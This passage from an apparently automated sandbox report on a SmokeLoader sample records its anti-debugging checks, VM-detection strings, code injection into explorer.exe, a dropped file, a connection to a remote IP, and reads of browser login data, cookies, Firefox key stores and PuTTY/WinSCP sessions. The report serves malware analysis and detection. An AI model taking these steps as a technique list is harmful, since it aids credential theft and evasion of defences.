                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7692Thread sleep time: -914000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7744Thread sleep count: 1126 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 7744Thread sleep time: -1126000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7844Thread sleep count: 902 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7844Thread sleep time: -902000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7948Thread sleep count: 552 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7948Thread sleep time: -552000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,6_2_03002B15
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03003ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,6_2_03003ED9
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03001D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,6_2_03001D4A
                    Source: C:\Windows\explorer.exeCode function: 7_2_009830A8 FindFirstFileW,FindNextFileW,FindClose,7_2_009830A8
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0083255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,8_2_0083255C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,9_2_003815BE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,9_2_003813FE
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_003814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,9_2_003814D8
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA1DB0 FindFirstFileW,FindNextFileW,FindClose,10_2_00CA1DB0
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA1EB4 FindFirstFileW,FindNextFileW,FindClose,10_2_00CA1EB4
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03006512 GetSystemInfo,6_2_03006512
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                    Source: explorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000001.00000000.1729353943.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                    Source: explorer.exe, 00000001.00000000.1728897911.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003250000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.000000000327B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000001.00000000.1729353943.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: explorer.exe, 00000001.00000000.1727291889.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                    Source: explorer.exe, 00000001.00000000.1728897911.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_00402920 LdrLoadDll,0_2_00402920
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00383862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,9_2_00383862
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,6_2_03002198
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03001000 GetProcessHeap,RtlAllocateHeap,6_2_03001000

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\explorer.exeFile created: rrrrcve.1.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeThread created: C:\Windows\explorer.exe EIP: 33F1960Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveThread created: unknown EIP: 87C1960Jump to behavior
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\Windows\explorer.exeMemory written: PID: 7616 base: 9479C0 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7640 base: 7FF72B812D10 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7672 base: 9479C0 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7688 base: 9479C0 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7716 base: 7FF72B812D10 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7740 base: 9479C0 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7840 base: 7FF72B812D10 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7900 base: 9479C0 value: 90Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: PID: 7944 base: 7FF72B812D10 value: 90Jump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0Jump to behavior
                    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9479C0Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe16_2_006D10A5
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep, explorer.exe16_2_006D1016
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1727134633.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1728897911.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000001.00000000.1725880029.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000001.00000000.1726228587.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030555EB cpuid 6_2_030555EB
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,6_2_03002112
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,6_2_03002198

                    Stealing of Sensitive Information

                    barindex
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara matchFile source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.binJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-updateJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3fJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011fJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txtJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9bJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.iniJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txtJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54eJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.jsonJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fdJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8eJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.jsonJump to behavior
